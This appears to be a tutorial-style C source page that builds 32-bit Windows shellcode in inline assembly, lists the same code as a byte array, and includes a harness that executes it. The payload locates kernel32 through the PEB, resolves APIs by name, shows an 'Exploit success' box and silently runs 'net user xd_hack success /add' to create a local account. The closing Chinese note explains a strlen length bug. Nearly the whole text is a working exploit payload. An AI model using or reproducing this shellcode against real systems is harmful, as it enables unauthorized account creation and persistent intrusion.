#include <stdio.h>
//#include <WINDOWS.H>
#include <string.h>

/*
 * Source form of the 32-bit x86 shellcode whose bytes are listed as the
 * `shellcode[]` array further down this page. It is kept as MSVC inline
 * assembly so that the compiler emits exactly these instructions:
 *
 *   1. walk the PEB loader list to obtain the base address of kernel32.dll;
 *   2. scan kernel32's export name table to resolve GetProcAddress and
 *      LoadLibraryA (only the first 8 / 12 bytes of each name are compared);
 *   3. LoadLibraryA("user32.dll"), GetProcAddress(user32, "MessageBoxA");
 *   4. MessageBoxA(0, "Exploit success", "Overflow", 0);
 *   5. GetProcAddress(kernel32, "WinExec") and
 *      WinExec("net user xd_hack success /add", SW_HIDE) - the observable
 *      host-side effect is the creation of a local user account;
 *   6. GetProcAddress(kernel32, "ExitProcess") and ExitProcess(0).
 *
 * Every string is assembled on the stack byte by byte, so the code contains
 * no absolute data references. Addresses quoted as "observed locally" are the
 * values the author saw on their own machine; the PEB/LDR offsets and the
 * "first 12-character module name in initialization order is kernel32.dll"
 * assumption fit the 32-bit Windows XP era layout (NOTE(review): not verified
 * here for later Windows versions).
 *
 * Outer frame (0x28 bytes reserved below ebp):
 *   [ebp-0x04] LoadLibraryA     [ebp-0x08] GetProcAddress
 *   [ebp-0x0C] kernel32 base    [ebp-0x10] WinExec
 *   [ebp-0x18] user32 HMODULE   [ebp-0x1C] MessageBoxA
 * Each API call opens a nested frame (push ebp / mov ebp,esp ... pop ebp) in
 * which its argument string is built; the "add esp,N" after each call only
 * discards that scratch area, the callee has already removed its arguments.
 */
void main(int argc, char **argv)
{
    _asm
    {
        push ebp                    // save the caller's frame pointer
        mov ebp,esp
        sub esp,0x28                // reserve 10*4 bytes for the resolved addresses
        //------------------------------------------------------------------------
        // Locate the base address of kernel32.dll (observed locally: 0x7C800000)
        push ebp
        mov ebp,esp
        xor ecx,ecx                 // cl = 0, the terminator byte compared below
        mov esi,fs:0x30             // TEB -> PEB
        mov esi,[esi + 0x0C]        // PEB -> Ldr
        mov esi,[esi + 0x1C]        // Ldr -> InInitializationOrderModuleList.Flink
next_module:
        mov ebp,[esi + 0x08]        // entry -> DllBase
        mov edi,[esi + 0x20]        // entry -> BaseDllName.Buffer (UTF-16)
        mov esi,[esi]               // advance to the next list entry
        cmp [edi+0x18],cl           // NUL at wide-char index 12, i.e. a 12-character name such as kernel32.dll
        jne next_module
        mov edi,ebp                 //baseAddr of Kernel32.dll
        pop ebp
        //------------------------------------------------------------------------
        // Keep the kernel32.dll base address; it is reused for every later lookup
        mov [ebp - 0xC],edi
        //------------------------------------------------------------------------
        // Scan kernel32's export name table for "GetProcAddress"
        mov eax,[edi + 3ch]         //IMAGE_DOS_HEADER->e_lfanew
        mov edx,[edi + eax + 78h]   // optional header DataDirectory[0].VirtualAddress: RVA of the export directory
        add edx,edi                 // edx -> IMAGE_EXPORT_DIRECTORY (virtual address)
        mov ecx,[edx + 18h]         //_IMAGE_EXPORT_DIRECTORY->NumberOfNames
        mov ebx,[edx + 20h]         //_IMAGE_EXPORT_DIRECTORY->AddressOfNames
        add ebx,edi                 //AddressOfName
search:
        dec ecx                     // scan from the last name downwards; there is no lower-bound check
        mov esi,[ebx+ecx*4]
        add esi,edi                 // esi -> exported name string
        mov eax,0x50746547          //PteG("GetP")
        cmp [esi],eax
        jne search
        mov eax,0x41636f72          //Acor("rocA")
        cmp [esi+4],eax
        jne search                  // only the first 8 bytes of the name are checked
        mov ebx,[edx + 24h]         // AddressOfNameOrdinals
        add ebx,edi;                //index address
        mov cx,[ebx + ecx*2]        // ordinal belonging to this name index
        mov ebx,[edx + 1ch]         // AddressOfFunctions
        add ebx,edi
        mov eax,[ebx + ecx*4]       // function RVA
        add eax,edi                 // eax -> GetProcAddress
        //------------------------------------------------------------------------
        // Save the address of GetProcAddress (observed locally: 0x7C80AE30)
        mov [ebp-0x8],eax
        //------------------------------------------------------------------------
        // Resolve LoadLibraryA with the same export-table walk
        mov edi,[ebp - 0xC]         // reload the kernel32.dll base address
        mov eax,[edi + 3ch]         //IMAGE_DOS_HEADER->e_lfanew
        mov edx,[edi + eax + 78h]   // RVA of the export directory
        add edx,edi                 // edx -> IMAGE_EXPORT_DIRECTORY (virtual address)
        mov ecx,[edx + 18h]         // NumberOfNames
        mov ebx,[edx + 20h]         // AddressOfNames
        add ebx,edi                 //AddressOfName
find_loadlibrary:
        dec ecx
        mov esi,[ebx + ecx*4]
        add esi,edi;
        mov eax,0x64616F4C          //Load("daoL")
        cmp [esi],eax
        jne find_loadlibrary
        mov eax,0x7262694C          //Libr("rbiL")
        cmp [esi+4],eax
        jne find_loadlibrary
        mov eax,0x41797261          //aryA("Ayra")
        cmp [esi+8],eax
        jne find_loadlibrary        // 12 bytes compared, the terminator is not
        mov ebx,[edx+24h]           // AddressOfNameOrdinals
        add ebx,edi;                //index address
        mov cx,[ebx+ecx*2]
        mov ebx,[edx+1ch]           // AddressOfFunctions
        add ebx,edi
        mov eax,[ebx+ecx*4]
        add eax,edi                 // eax -> LoadLibraryA
        //------------------------------------------------------------------------
        // Save the address of LoadLibraryA (observed locally: 0x7c801d7b)
        mov [ebp - 0x4],eax
        //------------------------------------------------------------------------
        //LoadLibraryA("user32.dll")
        mov eax,[ebp-0x4]           // eax -> LoadLibraryA
        push ebp
        mov ebp,esp
        xor ebx,ebx
        push ebx                    // three zero dwords: NUL-filled scratch for the name
        push ebx
        push ebx
        mov byte ptr[ebp-0xC],0x75  // 75 73 65 72 33 32 2E 64 6C 6C  ("user32.dll")
        mov byte ptr[ebp-0xB],0x73
        mov byte ptr[ebp-0xA],0x65
        mov byte ptr[ebp-0x9],0x72
        mov byte ptr[ebp-0x8],0x33
        mov byte ptr[ebp-0x7],0x32
        mov byte ptr[ebp-0x6],0x2E
        mov byte ptr[ebp-0x5],0x64
        mov byte ptr[ebp-0x4],0x6C
        mov byte ptr[ebp-0x3],0x6C  // [ebp-0x2] and [ebp-0x1] stay 0 and terminate the string
        lea ebx,[ebp-0xC]
        push ebx                    //push "user32.dll"
        call eax
        add esp,0xC                 // drop the three scratch dwords (the callee removed its argument)
        pop ebp
        //------------------------------------------------------------------------
        // Save the HMODULE of user32.dll
        mov [ebp-0x18],eax
        //------------------------------------------------------------------------
        mov eax,[ebp-0x18]          //user32.dll->hModule
        mov edx,[ebp-0x8]           //edx->GetProcAddress
        // Resolve MessageBoxA
        push ebp
        mov ebp,esp                 //edx->GetProcAddress(user32.dll->eax,MessageBoxA->ebx)
        xor ebx,ebx
        push ebx
        push ebx
        push ebx
        // 4D 65 73 73 61 67 65 42 6F 78 41  ("MessageBoxA")
        mov byte ptr[ebp-0xc],0x4D
        mov byte ptr[ebp-0xb],0x65
        mov byte ptr[ebp-0xa],0x73
        mov byte ptr[ebp-0x9],0x73
        mov byte ptr[ebp-0x8],0x61
        mov byte ptr[ebp-0x7],0x67
        mov byte ptr[ebp-0x6],0x65
        mov byte ptr[ebp-0x5],0x42
        mov byte ptr[ebp-0x4],0x6F
        mov byte ptr[ebp-0x3],0x78
        mov byte ptr[ebp-0x2],0x41
        lea ebx,[ebp-0xc]
        push ebx                    // lpProcName
        push eax                    // hModule
        call edx
        add esp,0xC
        pop ebp
        //------------------------------------------------------------------------
        // Save the address of MessageBoxA (observed locally: 77D507EA)
        mov [ebp-0x1c],eax
        //------------------------------------------------------------------------
        // Show a message box: MessageBoxA(0,"Exploit success","Overflow",0)
        push ebp
        mov ebp,esp
        xor ebx,ebx
        xor edx,edx
        push ebx                    // five zero dwords of scratch
        push ebx
        push ebx
        push ebx
        push ebx
        // 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73  ("Exploit success")
        mov byte ptr[ebp-0x10],0x45
        mov byte ptr[ebp-0x0f],0x78
        mov byte ptr[ebp-0xe],0x70
        mov byte ptr[ebp-0xd],0x6C
        mov byte ptr[ebp-0xc],0x6f
        mov byte ptr[ebp-0xb],0x69
        mov byte ptr[ebp-0xa],0x74
        mov byte ptr[ebp-0x9],0x20
        mov byte ptr[ebp-0x8],0x73
        mov byte ptr[ebp-0x7],0x75
        mov byte ptr[ebp-0x6],0x63
        mov byte ptr[ebp-0x5],0x63
        mov byte ptr[ebp-0x4],0x65
        mov byte ptr[ebp-0x3],0x73
        mov byte ptr[ebp-0x2],0x73
        lea ebx,[ebp-0x10]          // ebx -> "Exploit success"
        //push "Overflow"  (two dwords; the untouched zero byte at [ebp-0x14] terminates it)
        push 0x776F6C66
        push 0x7265764F
        mov edx,esp                 // edx -> "Overflow"
        //MessageBoxA(0,ebx,edx,0)
        push 0
        push edx
        push ebx
        push 0
        call eax
        add esp,0x1c                // 5 scratch dwords + 2 caption dwords
        pop ebp
        //------------------------------------------------------------------------
        // Resolve WinExec
        //eax->GetProcAddress(edx->kernel32.dll,ebx->WinExec)
        mov eax,[ebp-0x8]
        mov edx,[ebp-0xc]
        push ebp
        mov ebp,esp
        xor ebx,ebx
        push ebx
        push ebx
        // 57 69 6E 45 78 65 63  ("WinExec")
        mov byte ptr[ebp-0x8],0x57
        mov byte ptr[ebp-0x7],0x69
        mov byte ptr[ebp-0x6],0x6e
        mov byte ptr[ebp-0x5],0x45
        mov byte ptr[ebp-0x4],0x78
        mov byte ptr[ebp-0x3],0x65
        mov byte ptr[ebp-0x2],0x63
        lea ebx,[ebp-0x8]
        push ebx
        push edx
        call eax
        add esp,0x08
        pop ebp
        //------------------------------------------------------------------------
        // Save the address of WinExec
        mov [ebp-0x10],eax
        //------------------------------------------------------------------------
        //WinExec("net user xd_hack success /add",SW_HIDE)
        mov eax,[ebp-0x10]
        push ebp
        mov ebp,esp
        xor ebx,ebx
        push ebx                    // eight zero dwords of scratch (0x20 bytes)
        push ebx
        push ebx
        push ebx
        push ebx
        push ebx
        push ebx
        push ebx
        // 6E 65 74 20 75 73 65 72 20 78 64 5F 68 61 63 6B 20 73 75 63 63 65 73 73 20 2F 61 64 64
        mov byte ptr[ebp-0x20],0x6E
        mov byte ptr[ebp-0x1f],0x65
        mov byte ptr[ebp-0x1e],0x74
        mov byte ptr[ebp-0x1d],0x20
        mov byte ptr[ebp-0x1c],0x75
        mov byte ptr[ebp-0x1b],0x73
        mov byte ptr[ebp-0x1a],0x65
        mov byte ptr[ebp-0x19],0x72
        mov byte ptr[ebp-0x18],0x20
        mov byte ptr[ebp-0x17],0x78
        mov byte ptr[ebp-0x16],0x64
        mov byte ptr[ebp-0x15],0x5f
        mov byte ptr[ebp-0x14],0x68
        mov byte ptr[ebp-0x13],0x61
        mov byte ptr[ebp-0x12],0x63
        mov byte ptr[ebp-0x11],0x6b
        mov byte ptr[ebp-0x10],0x20
        mov byte ptr[ebp-0x0f],0x73
        mov byte ptr[ebp-0x0e],0x75
        mov byte ptr[ebp-0x0d],0x63
        mov byte ptr[ebp-0x0c],0x63
        mov byte ptr[ebp-0x0b],0x65
        mov byte ptr[ebp-0x0a],0x73
        mov byte ptr[ebp-0x09],0x73
        mov byte ptr[ebp-0x08],0x20
        mov byte ptr[ebp-0x07],0x2f
        mov byte ptr[ebp-0x06],0x61
        mov byte ptr[ebp-0x05],0x64
        mov byte ptr[ebp-0x04],0x64  // [ebp-0x03] stays 0 and terminates the command line
        lea ebx,[ebp-0x20]
        push 0                      // uCmdShow = SW_HIDE
        push ebx                    // lpCmdLine
        call eax
        add esp,0x20
        pop ebp
        //------------------------------------------------------------------------
        // Resolve ExitProcess
        //eax->GetProcAddress(edx->kernel32.dll,ebx->ExitProcess)
        mov eax,[ebp-0x8]
        mov edx,[ebp-0xc]
        push ebp
        mov ebp,esp
        xor ebx,ebx
        push ebx
        push ebx
        push ebx
        // 45 78 69 74 50 72 6F 63 65 73 73  ("ExitProcess")
        mov byte ptr[ebp-0xc],0x45
        mov byte ptr[ebp-0xb],0x78
        mov byte ptr[ebp-0xa],0x69
        mov byte ptr[ebp-0x9],0x74
        mov byte ptr[ebp-0x8],0x50
        mov byte ptr[ebp-0x7],0x72
        mov byte ptr[ebp-0x6],0x6f
        mov byte ptr[ebp-0x5],0x63
        mov byte ptr[ebp-0x4],0x65
        mov byte ptr[ebp-0x3],0x73
        mov byte ptr[ebp-0x2],0x73
        lea ebx,[ebp-0xc]
        push ebx
        push edx
        call eax
        add esp,0xc
        pop ebp
        //------------------------------------------------------------------------
        // Terminate the process
        // Release the 0x28 bytes reserved at the start and restore ebp first
        add esp,0x28
        pop ebp
        push 0                      // uExitCode
        call eax                    // ExitProcess(0) - does not return
        //------------------------------------------------------------------------
        //add esp,0x28 // stack balance (superseded by the sequence above)
        //pop ebp      // restore ebp
    }
}
对应的机器码
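#include <stdio.h>  //printf
#include <string.h> //strlen

/*
 * Machine code produced for the inline-assembly routine above: PEB walk to
 * kernel32.dll, export-table lookup of GetProcAddress and LoadLibraryA, then
 * MessageBoxA, WinExec("net user xd_hack success /add") and ExitProcess.
 * The array contains 0x00 bytes (the very first line already has three,
 * inside the fs:[0x30] displacement), so its length must be measured with
 * sizeof, never with strlen(). The trailing "\x5F\x5E\x5B\x5D\xC3" appears to
 * be the compiler's function epilogue, which is never reached because
 * ExitProcess is called before it.
 */
char shellcode[] = "\x55\x8B\xEC\x83\xEC\x28\x55\x8B\xEC\x33\xC9\x64\x8B"
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08\x8B\x7E\x20\x8B\x36"
"\x38\x4F\x18\x75\xF3\x8B\xFD\x5D\x89\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03"
"\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF\x49\x8B\x34\x8B\x03\xF7\xB8\x47\x65\x74"
"\x50\x39\x06\x75\xF1\xB8\x72\x6F\x63\x41\x39\x46\x04\x75\xE7\x8B\x5A\x24\x03"
"\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xF8\x8B"
"\x7D\xF4\x8B\x47\x3C\x8B\x54\x07\x78\x03\xD7\x8B\x4A\x18\x8B\x5A\x20\x03\xDF"
"\x49\x8B\x34\x8B\x03\xF7\xB8\x4C\x6F\x61\x64\x39\x06\x75\xF1\xB8\x4C\x69\x62"
"\x72\x39\x46\x04\x75\xE7\xB8\x61\x72\x79\x41\x39\x46\x08\x75\xDD\x8B\x5A\x24"
"\x03\xDF\x66\x8B\x0C\x4B\x8B\x5A\x1C\x03\xDF\x8B\x04\x8B\x03\xC7\x89\x45\xFC"
"\x8B\x45\xFC\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x75\xC6\x45\xF5\x73"
"\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x33\xC6\x45\xF9\x32\xC6\x45\xFA"
"\x2E\xC6\x45\xFB\x64\xC6\x45\xFC\x6C\xC6\x45\xFD\x6C\x8D\x5D\xF4\x53\xFF\xD0"
"\x83\xC4\x0C\x5D\x89\x45\xE8\x8B\x45\xE8\x8B\x55\xF8\x55\x8B\xEC\x33\xDB\x53"
"\x53\x53\xC6\x45\xF4\x4D\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6\x45\xF7\x73\xC6"
"\x45\xF8\x61\xC6\x45\xF9\x67\xC6\x45\xFA\x65\xC6\x45\xFB\x42\xC6\x45\xFC\x6F"
"\xC6\x45\xFD\x78\xC6\x45\xFE\x41\x8D\x5D\xF4\x53\x50\xFF\xD2\x83\xC4\x0C\x5D"
"\x89\x45\xE4\x55\x8B\xEC\x33\xDB\x33\xD2\x53\x53\x53\x53\x53\xC6\x45\xF0\x45"
"\xC6\x45\xF1\x78\xC6\x45\xF2\x70\xC6\x45\xF3\x6C\xC6\x45\xF4\x6F\xC6\x45\xF5"
"\x69\xC6\x45\xF6\x74\xC6\x45\xF7\x20\xC6\x45\xF8\x73\xC6\x45\xF9\x75\xC6\x45"
"\xFA\x63\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D"
"\x5D\xF0\x68\x66\x6C\x6F\x77\x68\x4F\x76\x65\x72\x8B\xD4\x6A\x00\x52\x53\x6A"
"\x00\xFF\xD0\x83\xC4\x1C\x5D\x8B\x45\xF8\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53"
"\x53\xC6\x45\xF8\x57\xC6\x45\xF9\x69\xC6\x45\xFA\x6E\xC6\x45\xFB\x45\xC6\x45"
"\xFC\x78\xC6\x45\xFD\x65\xC6\x45\xFE\x63\x8D\x5D\xF8\x53\x52\xFF\xD0\x83\xC4"
"\x08\x5D\x89\x45\xF0\x8B\x45\xF0\x55\x8B\xEC\x33\xDB\x53\x53\x53\x53\x53\x53"
"\x53\x53\xC6\x45\xE0\x6E\xC6\x45\xE1\x65\xC6\x45\xE2\x74\xC6\x45\xE3\x20\xC6"
"\x45\xE4\x75\xC6\x45\xE5\x73\xC6\x45\xE6\x65\xC6\x45\xE7\x72\xC6\x45\xE8\x20"
"\xC6\x45\xE9\x78\xC6\x45\xEA\x64\xC6\x45\xEB\x5F\xC6\x45\xEC\x68\xC6\x45\xED"
"\x61\xC6\x45\xEE\x63\xC6\x45\xEF\x6B\xC6\x45\xF0\x20\xC6\x45\xF1\x73\xC6\x45"
"\xF2\x75\xC6\x45\xF3\x63\xC6\x45\xF4\x63\xC6\x45\xF5\x65\xC6\x45\xF6\x73\xC6"
"\x45\xF7\x73\xC6\x45\xF8\x20\xC6\x45\xF9\x2F\xC6\x45\xFA\x61\xC6\x45\xFB\x64"
"\xC6\x45\xFC\x64\x8D\x5D\xE0\x6A\x00\x53\xFF\xD0\x83\xC4\x20\x5D\x8B\x45\xF8"
"\x8B\x55\xF4\x55\x8B\xEC\x33\xDB\x53\x53\x53\xC6\x45\xF4\x45\xC6\x45\xF5\x78"
"\xC6\x45\xF6\x69\xC6\x45\xF7\x74\xC6\x45\xF8\x50\xC6\x45\xF9\x72\xC6\x45\xFA"
"\x6F\xC6\x45\xFB\x63\xC6\x45\xFC\x65\xC6\x45\xFD\x73\xC6\x45\xFE\x73\x8D\x5D"
"\xF4\x53\x52\xFF\xD0\x83\xC4\x0C\x5D\x83\xC4\x28\x5D\x6A\x00\xFF\xD0\x5F\x5E"
"\x5B\x5D\xC3";

/*
 * Test harness: print the size of the shellcode, then jump into it.
 *
 * Fix versus the original: strlen() stops at the first embedded 0x00 byte,
 * which is why the printed length was too small, and "%x" expects an
 * unsigned int while strlen() returns size_t. sizeof counts the whole array
 * including the terminating NUL that the string literal adds, hence the -1.
 *
 * The shellcode ends by calling ExitProcess, so control is not expected to
 * return here; executing a data array this way also faults unless the
 * memory it lives in is executable (DEP/NX blocks it).
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    size_t len = sizeof shellcode - 1;
    printf("Shellcode Length is : %zu \n", len);

    int (*func)(void) = (int (*)(void)) &shellcode;
    func();
    return 0;
}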
返回的长度不对：strlen 遇到数组中第一个 0x00 字节就停止计数，所以打印出的值偏小；实际长度为 700 个字节（用 sizeof(shellcode) - 1 才能得到完整长度）。